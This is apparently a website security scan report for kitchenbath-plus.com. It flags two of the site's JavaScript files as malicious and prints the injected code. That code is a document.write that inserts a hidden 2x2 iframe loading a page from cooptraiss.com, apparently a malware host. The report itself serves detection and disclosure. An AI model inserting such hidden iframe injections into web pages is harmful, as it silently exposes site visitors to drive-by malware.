Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=kitchenbath-plus.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.kitchenbath-plus.com/ | 200 OK Content-Length: 9371 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js | 200 OK Content-Length: 57254 Content-Type: text/javascript | clean |
http://www.kitchenbath-plus.com/qm.js | 200 OK Content-Length: 3715 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=630271></iframe>');
qmu=true;var qm_si,qm_li,qm_lo,qm_tt,qm_th,qm_ts;var qp="parentNode";var qc="className";var qm_t=navigator.userAgent;var qm_o=qm_t.indexOf("Opera")+1;var qm_s=qm_t.indexOf("afari")+1;var qm_s2=qm_s&&window.XMLHttpRequest;var qm_n=qm_t.indexOf("Netscape")+1;var qm_v=parseFloat(navigator.vendorSub);if(window.showHe Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://cooptraiss.com/hezd.html?j=630271 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=630271> | ||
http://www.kitchenbath-plus.com/qm_slide_effect.js | 200 OK Content-Length: 3297 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=630271></iframe>');
qmad.slide=new Object();if(qmad.bvis.indexOf("qm_slide_a(b.cdiv);")==-1)qmad.bvis+="qm_slide_a(b.cdiv);";if(qmad.bhide.indexOf("qm_slide_a(a,1);")==-1)qmad.bhide+="qm_slide_a(a,1);";qmad.br_navigator=navigator.userAgent.indexOf("Netscape")+1;qmad.br_version=parseFloat(navigator.vendorSub);qmad.br_oldnav=qmad.br_navigator Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://cooptraiss.com/hezd.html?j=630271 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://cooptraiss.com/hezd.html?j=630271> | ||
http://www.kitchenbath-plus.com/test404page.js | 404 Not Found Content-Length: 12839 Content-Type: text/html | clean |
http://code.jquery.com/jquery-1.9.1.js | 200 OK Content-Length: 268381 Content-Type: application/x-javascript | clean |
http://suspended.hostgator.com/js/simple-expand.min.js | 200 OK Content-Length: 2782 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: kitchenbath-plus.com
Result:
GET / HTTP/1.1
Host: kitchenbath-plus.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: kitchenbath-plus.com
Referer: http://www.google.com/search?q=kitchenbath-plus.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: kitchenbath-plus.com
Referer: http://www.google.com/search?q=kitchenbath-plus.com
Result:
The result is similar to the first query. There are no suspicious redirects found.